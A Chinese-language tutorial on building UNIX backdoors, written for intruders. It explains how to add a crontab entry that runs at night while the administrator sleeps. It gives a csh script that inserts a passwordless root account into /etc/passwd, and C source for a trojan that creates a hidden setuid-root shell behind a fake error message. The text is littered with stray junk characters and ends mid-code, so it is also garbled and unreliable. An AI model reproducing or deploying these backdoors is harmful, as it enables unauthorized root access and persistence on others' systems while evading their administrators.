教你怎样创建UNIX后门(高级篇)

会计考友

Crontab 程序对于系统管理员来说是非常有用的。Cron 服务用于计划程序在特定时间（月、日、周、时、分）运行。如果你足够聪明，就应该加以利用，使之为我们制造"后门"!通过 Cron 服务，你可以让它在每天凌晨 2:00 （这个时候网管应该睡觉了吧。）运行后门程序，使你能够轻易进入系统干你想干的事，并在网管起来之前退出系统。根用户的 crontab 文件放在 /var/spool/crontab/root 中，其格式如下：
- Y3 B5 h( Q9 }1 r4 w, m   （1） （2） （3） （4） （5） （6）
2 W: C: P( I' K1 K! O   0 0 * * 3 /usr/bin/updatedb
. x1 O- b3 j. ^( s   1. 分钟 （0-60）
   2. 小时 （0-23）
   3. 日 （1-31）
   4. 月 （1-12）
   5. 星期 （1-7）
   6. 所要运行的程序
   以上内容设置该程序于每星期三 0:0 运行。要在 cron 建立后门，只需在 /var/spool/crontab/root 中添加后门程序即可。例如该程序可以在每天检查我们在 /etc/passwd 文件中增加了用户帐号是否仍然有效。以下是程序示例：
" |) q& a& ~5 D4 y8 h   0 0 * * * /usr/bin/retract
    backdoor/backdoor.sh
( C* P* _  w0 P; m   #!/bin/csh
   set evilflag = （`grep eviluser /etc/passwd`）
3 {( p" u" ^" O; f   if（$#evilflag == 0） then
   set linecount = `wc -l /etc/passwd`
   cd
   cp /etc/passwd ./temppass
   @ linecount[1] /= 2
   @ linecount[1] += 1
   split -$linecount[1] ./temppass
2 X, y6 w( w& E% ]# ^   echo "Meb::0:0:Meb:/root:/bin/sh" 》 ./xaa
   cat ./xab 》 ./xaa
   mv ./xaa /etc/passwd
   chmod 644 /etc/passwd
   rm ./xa* ./temppass
# h6 L. o/ L/ d$ P   echo Done…
- p, ^( i+ Q0 u" U/ v   else
   endif
   当然，我们可以编写木马程序，并把它放到 /bin 目录下。当以特定命令行参数运行时将产生一个 suid shell.以下是程序示例：
    backdoor/backdoor3.c
- t4 Z# _( W3 \( U. C; @* J   #include
   #define pass "triad"
! {3 V) I* X) W# R   #define BUFFERSIZE 6
0 j" ]/ R& q6 b1 o   int main（argc, argv）
   int argc;
5 j% p8 k* A6 u% z- y7 F   char *argv[];{
   int i=0;
   if（argv[1]）{
   if（！（strcmp（pass,argv[1]）））{
# }) p. A" [! `: m; |$ x   system（"cp /bin/csh /bin/.swp121"）；
   system（"chmod 4755 /bin/.swp121"）；
  C9 _# s3 w/ z/ X   system（"chown root /bin/.swp121"）；
   system（"chmod 4755 /bin/.swp121"）；
   }
   }
6 N4 ~: \  i& W, N   printf（"372f: Invalid control argument, unable to initialize. Retrying"）；
   for（；i